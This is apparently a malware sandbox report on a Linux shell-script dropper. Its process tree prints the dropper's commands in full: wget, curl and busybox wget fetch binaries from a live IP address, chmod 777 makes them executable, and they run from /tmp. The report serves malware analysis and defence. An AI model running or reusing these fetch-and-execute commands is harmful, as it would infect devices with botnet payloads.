Analysis
-
max time kernel
150s -
max time network
147s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
25/11/2024, 02:54
Static task
static1
Behavioral task
behavioral1
Sample
b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh
-
Size
10KB
-
MD5
b643808c01faa0f92bf870288eb8dd16
-
SHA1
494306996b3ee0573b6da340ee334523cd39f9eb
-
SHA256
b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad
-
SHA512
f8e2bed091a7cf127f3feadc979a7ee81e9835a68b98f78afc737f354cdf3348e42f4551cc47d805e0734fd77e02963e665aad84c33c02e18395f86754ae24cb
-
SSDEEP
96:+Hb3G9hf3INVTX1G+Emzer6e0D7tAokHbrf3+PTX1G+1emzer6wN6W:+Hb3VvTX1G+EmzereTX1G+Mmzerx
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 25 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 744 chmod 822 chmod 874 chmod 937 chmod 955 chmod 962 chmod 968 chmod 757 chmod 798 chmod 889 chmod 907 chmod 913 chmod 751 chmod 776 chmod 895 chmod 883 chmod 901 chmod 919 chmod 925 chmod 931 chmod 829 chmod 835 chmod 851 chmod 943 chmod 949 chmod -
Executes dropped EXE 25 IoCs
ioc pid Process /tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59 745 Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59 /tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7 752 RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7 /tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs 758 CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs /tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q 777 QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q /tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF 799 z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF /tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB 823 8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB /tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av 830 nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av /tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC 836 roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC /tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL 852 i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL /tmp/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P 875 MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P /tmp/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe 884 6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe /tmp/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy 890 8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy /tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu 896 xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu /tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f 902 2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f /tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59 908 Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59 /tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF 914 z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF /tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB 920 8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB /tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av 926 nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av /tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC 932 roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC /tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7 938 RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7 /tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs 944 CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs /tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q 950 QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q /tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL 956 i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL /tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu 963 xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu /tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f 969 2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 25 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q curl File opened for modification /tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF curl File opened for modification /tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB curl File opened for modification /tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av curl File opened for modification /tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f curl File opened for modification /tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF curl File opened for modification /tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f curl File opened for modification /tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs curl File opened for modification /tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7 curl File opened for modification /tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs curl File opened for modification /tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC curl File opened for modification /tmp/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy curl File opened for modification /tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu curl File opened for modification /tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59 curl File opened for modification /tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC curl File opened for modification /tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q curl File opened for modification /tmp/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P curl File opened for modification /tmp/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe curl File opened for modification /tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB curl File opened for modification /tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av curl File opened for modification /tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7 curl File opened for modification /tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59 curl File opened for modification /tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL curl File opened for modification /tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL curl File opened for modification /tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu curl
Processes
-
/tmp/b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh/tmp/b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh1⤵PID:714
-
/bin/rm/bin/rm bins.sh2⤵PID:720
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵PID:722
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵
- Reads runtime system information
- Writes file to tmp directory
PID:732
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵PID:740
-
-
/bin/chmodchmod 777 Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵
- File and Directory Permissions Modification
PID:744
-
-
/tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59./Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵
- Executes dropped EXE
PID:745
-
-
/bin/rmrm Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵PID:746
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵PID:747
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:749
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵PID:750
-
-
/bin/chmodchmod 777 RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵
- File and Directory Permissions Modification
PID:751
-
-
/tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7./RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵
- Executes dropped EXE
PID:752
-
-
/bin/rmrm RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵PID:753
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵PID:754
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:755
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵PID:756
-
-
/bin/chmodchmod 777 CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵
- File and Directory Permissions Modification
PID:757
-
-
/tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs./CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵
- Executes dropped EXE
PID:758
-
-
/bin/rmrm CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵PID:760
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵PID:763
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:764
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵PID:772
-
-
/bin/chmodchmod 777 QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵
- File and Directory Permissions Modification
PID:776
-
-
/tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q./QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵
- Executes dropped EXE
PID:777
-
-
/bin/rmrm QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵PID:780
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵PID:781
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:786
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵PID:794
-
-
/bin/chmodchmod 777 z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵
- File and Directory Permissions Modification
PID:798
-
-
/tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF./z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵
- Executes dropped EXE
PID:799
-
-
/bin/rmrm z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵PID:802
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵PID:803
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:812
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵PID:821
-
-
/bin/chmodchmod 777 8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵
- File and Directory Permissions Modification
PID:822
-
-
/tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB./8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵
- Executes dropped EXE
PID:823
-
-
/bin/rmrm 8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵PID:825
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵PID:826
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:827
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵PID:828
-
-
/bin/chmodchmod 777 nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av./nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵
- Executes dropped EXE
PID:830
-
-
/bin/rmrm nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵PID:831
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵PID:832
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:833
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵PID:834
-
-
/bin/chmodchmod 777 roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵
- File and Directory Permissions Modification
PID:835
-
-
/tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC./roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵
- Executes dropped EXE
PID:836
-
-
/bin/rmrm roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵PID:837
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵PID:838
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:839
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵PID:847
-
-
/bin/chmodchmod 777 i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵
- File and Directory Permissions Modification
PID:851
-
-
/tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL./i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵
- Executes dropped EXE
PID:852
-
-
/bin/rmrm i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵PID:855
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P2⤵PID:857
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:863
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P2⤵PID:870
-
-
/bin/chmodchmod 777 MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P2⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P./MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P2⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P2⤵PID:878
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe2⤵PID:880
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:881
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe2⤵PID:882
-
-
/bin/chmodchmod 777 6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe2⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe./6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe2⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm 6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe2⤵PID:885
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy2⤵PID:886
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy2⤵PID:888
-
-
/bin/chmodchmod 777 8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy2⤵
- File and Directory Permissions Modification
PID:889
-
-
/tmp/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy./8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy2⤵
- Executes dropped EXE
PID:890
-
-
/bin/rmrm 8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy2⤵PID:891
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵PID:892
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:893
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵PID:894
-
-
/bin/chmodchmod 777 xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu./xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵PID:897
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵PID:898
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵PID:900
-
-
/bin/chmodchmod 777 2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f./2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm 2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵PID:903
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵PID:904
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵
- Reads runtime system information
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵PID:906
-
-
/bin/chmodchmod 777 Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59./Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵
- Executes dropped EXE
PID:908
-
-
/bin/rmrm Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵PID:909
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵PID:910
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:911
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵PID:912
-
-
/bin/chmodchmod 777 z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF./z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵
- Executes dropped EXE
PID:914
-
-
/bin/rmrm z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵PID:915
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵PID:916
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵PID:918
-
-
/bin/chmodchmod 777 8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB./8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵
- Executes dropped EXE
PID:920
-
-
/bin/rmrm 8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵PID:921
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵PID:922
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:923
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵PID:924
-
-
/bin/chmodchmod 777 nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av./nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵PID:927
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵PID:928
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵PID:930
-
-
/bin/chmodchmod 777 roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵
- File and Directory Permissions Modification
PID:931
-
-
/tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC./roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵
- Executes dropped EXE
PID:932
-
-
/bin/rmrm roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵PID:933
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵PID:934
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:935
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵PID:936
-
-
/bin/chmodchmod 777 RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7./RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵PID:939
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵PID:940
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵PID:942
-
-
/bin/chmodchmod 777 CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs./CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵PID:945
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵PID:946
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵PID:948
-
-
/bin/chmodchmod 777 QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵
- File and Directory Permissions Modification
PID:949
-
-
/tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q./QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵
- Executes dropped EXE
PID:950
-
-
